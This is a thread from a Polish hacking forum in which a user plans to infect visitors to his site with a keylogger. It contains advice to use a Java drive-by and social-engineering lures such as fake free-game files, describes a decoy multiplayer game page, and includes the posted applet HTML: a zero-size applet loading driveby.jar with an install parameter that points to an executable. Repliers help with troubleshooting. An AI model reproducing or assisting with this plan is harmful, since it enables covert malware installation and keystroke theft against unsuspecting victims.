Skrypt pobierający plik bez potwierdzenia

Arthex

Użytkownik
Dołączył
Lipiec 10, 2012
Posty
15
Witam.
Czy istnieje jakiś skrypt (najbardziej mi tu pasuje JS) który będzie pobierać automatycznie plik z serwera na komputer bez potwierdzenia ?
Przykład:
Ofiara wchodzi na moją stronę, automatycznie po wejściu pobiera się plik, od razu mówię że ten plik ma być serwerem do jakiegoś keyloggera na 90% wybiorę SharpKeylogger v1.0, jest o nim dużo pozytywnych opinii ale nie wiem jak z wykrywalnością ...
I ostatnie pytanie : Powiedzmy że mam już przygotowaną stronę, ofiara na nią weszła i pobrał jej się server, co zrobić aby ten plik (.exe) od razu po pobraniu się odpalił bez wiedzy tej osoby ?
 

photrufr

Użytkownik
Dołączył
Listopad 1, 2011
Posty
32
automatycznego nie ma. Ofiara bedzie musiala to zaakceptowac. (jezeli chcesz taki skrypt to poszukaj w google, to prostsze niż myślisz)

co do ostatniego pytania to java drive by(wygoogluj). Ale w zwiazku z odpowiedzia na 1st pytanie zastosowałbym socjotechnikę polegającą na naiwności ínnych. Cos w stylu pliku nazwanego cs 1.6 steam for free. Mam nadzieję ze rozumiesz o co mi chodzi
 
Ostatnia edycja:

Arthex

Użytkownik
Dołączył
Lipiec 10, 2012
Posty
15
Dzięki za odpowiedź, z zachęceniem ofiary do zaakceptowania nie będzie większego problemu (aplet java) że tak powiem :D.
Właśnie pobrałem Drive-By i działa.

Jeśli ktoś posiada wersję sharpKeylogger'a w wersji 1.2 (klient i serwer) to proszę o podanie linku bo w temacie o tym Keyloggerze linki wygasły.

D.F., jeśli posiadasz link do tego keyloggera to poproszę o wstawienie.
Z góry dzięki.


Zamierzam zrobić index strony na której będzie gra multiplayer w javie, osoba która wejdzie na stronę i zaakceptuje aplet uruchomi drive-by który pobierze i odpali u niej server.exe właśnie tego keylogera o którym pisałem, może Ty posiadasz tego keylogera ? bardzo mi na nim zależy.
 
Ostatnia edycja:

Arthex

Użytkownik
Dołączył
Lipiec 10, 2012
Posty
15
Mam mały problem z tym drive-by.
Po wejściu na stronę uruchamia aplet javy , klikam "run" i problem w tym, że nic się nie dzieje. na serwerze ftp mam wgrany plik : install.exe nie jest to wirus itp. jest to mała instalka która pobiera grę.
W kodzie strony podałem lokalizację tego pliku, sprawdzałem już 2 razy i dalej nic.
Wiecie jak rozwiązać ten problem ?

Kod strony (drive-by)

Kod:
<applet code = "driveby.Launcher.class" archive = "http://mojastrona.pl/driveby.jar" width = "0" height = "0">
    <param name = "install" value = "http://mojastrona.pl/install.exe">
</applet>
 

panczo12d

Użytkownik
Dołączył
Styczeń 22, 2011
Posty
61
skoro nie działa to masz lipny kod, szukaj innego.
SharpKeylogger nie ma chyba takiego czegoś jak klient i serwer, po prostu generujesz keylogger a logi Ci przychodzą na ftp. I on jest płatny z tego co mi wiadomo.
 
Do góry Bottom